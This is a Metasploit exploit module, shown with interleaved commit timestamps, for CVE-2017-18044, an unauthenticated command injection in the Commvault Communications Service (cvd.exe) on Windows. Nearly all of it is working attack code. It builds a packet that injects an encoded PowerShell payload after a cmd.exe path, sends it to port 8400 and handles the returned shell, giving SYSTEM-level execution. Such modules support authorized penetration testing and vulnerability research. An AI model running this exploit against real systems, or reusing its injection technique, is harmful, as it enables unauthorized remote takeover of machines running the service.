2017-12-22 10:04:13 -05:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
|
Rank = GoodRanking
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
|
include Msf::Exploit::Powershell
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Commvault Communications Service (cvd) Command Injection',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a command injection vulnerability
|
|
|
|
|
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
|
|
|
|
|
and v10). The vulnerability exists in the cvd.exe service and allows an
|
|
|
|
|
attacker to execute arbitrary commands in the context of the service. By
|
2017-12-22 10:54:31 -05:00
|
|
|
default, the Commvault Communications service installs and runs as SYSTEM in
|
|
|
|
|
Windows and does not require authentication. This vulnerability was discovered
|
2017-12-22 10:04:13 -05:00
|
|
|
in the Windows version. The Linux version wasn't tested.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
2018-07-12 17:34:52 -05:00
|
|
|
['CVE', '2017-18044'],
|
2017-12-22 10:04:13 -05:00
|
|
|
['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
|
|
|
|
|
],
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
|
|
|
|
|
{
|
|
|
|
|
'Arch' => [ARCH_X64, ARCH_X86]
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
],
|
2017-12-22 10:51:01 -05:00
|
|
|
'Privileged' => true,
|
2017-12-22 10:04:13 -05:00
|
|
|
'DefaultTarget' => 0,
|
2020-10-02 17:38:06 +01:00
|
|
|
'DisclosureDate' => '2017-12-12'))
|
2017-12-22 10:04:13 -05:00
|
|
|
|
2017-12-22 10:51:01 -05:00
|
|
|
register_options([Opt::RPORT(8400)])
|
|
|
|
|
|
2017-12-22 10:04:13 -05:00
|
|
|
end
|
|
|
|
|
|
2017-12-22 10:54:31 -05:00
|
|
|
def exploit
|
2017-12-22 10:04:13 -05:00
|
|
|
|
2017-12-22 10:51:01 -05:00
|
|
|
buf = build_exploit
|
|
|
|
|
print_status("Connecting to Commvault Communications Service.")
|
2017-12-22 10:04:13 -05:00
|
|
|
connect
|
2017-12-22 10:51:01 -05:00
|
|
|
print_status("Executing payload")
|
2017-12-22 10:04:13 -05:00
|
|
|
#Send the payload
|
|
|
|
|
sock.put(buf)
|
|
|
|
|
#Handle the shell
|
|
|
|
|
handler
|
|
|
|
|
disconnect
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
2017-12-22 10:51:01 -05:00
|
|
|
def build_exploit
|
2017-12-22 10:54:31 -05:00
|
|
|
|
2017-12-22 10:04:13 -05:00
|
|
|
#Get encoded powershell of payload
|
|
|
|
|
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
|
|
|
|
|
#Remove additional cmd.exe call
|
|
|
|
|
psh = "powershell"
|
|
|
|
|
idx = command.index(psh)
|
|
|
|
|
command = command[(idx)..-1]
|
2017-12-22 10:57:11 -05:00
|
|
|
|
2017-12-22 10:04:13 -05:00
|
|
|
#Build packet
|
2017-12-22 10:51:01 -05:00
|
|
|
cmd_path = 'C:\Windows\System32\cmd.exe'
|
2017-12-22 10:04:13 -05:00
|
|
|
msg_type = 9
|
|
|
|
|
zero = 0
|
|
|
|
|
payload = ""
|
|
|
|
|
payload += make_nops(8)
|
|
|
|
|
payload += [msg_type].pack('I>')
|
|
|
|
|
payload += make_nops(328)
|
|
|
|
|
payload += cmd_path
|
|
|
|
|
payload += ";"
|
|
|
|
|
payload += ' /c "'
|
|
|
|
|
payload += command
|
|
|
|
|
payload += '" && echo '
|
|
|
|
|
payload += "\x00"
|
|
|
|
|
payload += [zero].pack('I>')
|
2017-12-22 10:54:31 -05:00
|
|
|
|
2017-12-22 10:04:13 -05:00
|
|
|
#Add length header and payload
|
|
|
|
|
ret_data = [payload.length].pack('I>')
|
2017-12-22 10:51:01 -05:00
|
|
|
ret_data += payload
|
2017-12-22 10:04:13 -05:00
|
|
|
|
2017-12-22 10:51:01 -05:00
|
|
|
ret_data
|
2017-12-22 10:04:13 -05:00
|
|
|
|
|
|
|
|
end
|
|
|
|
|
end
|
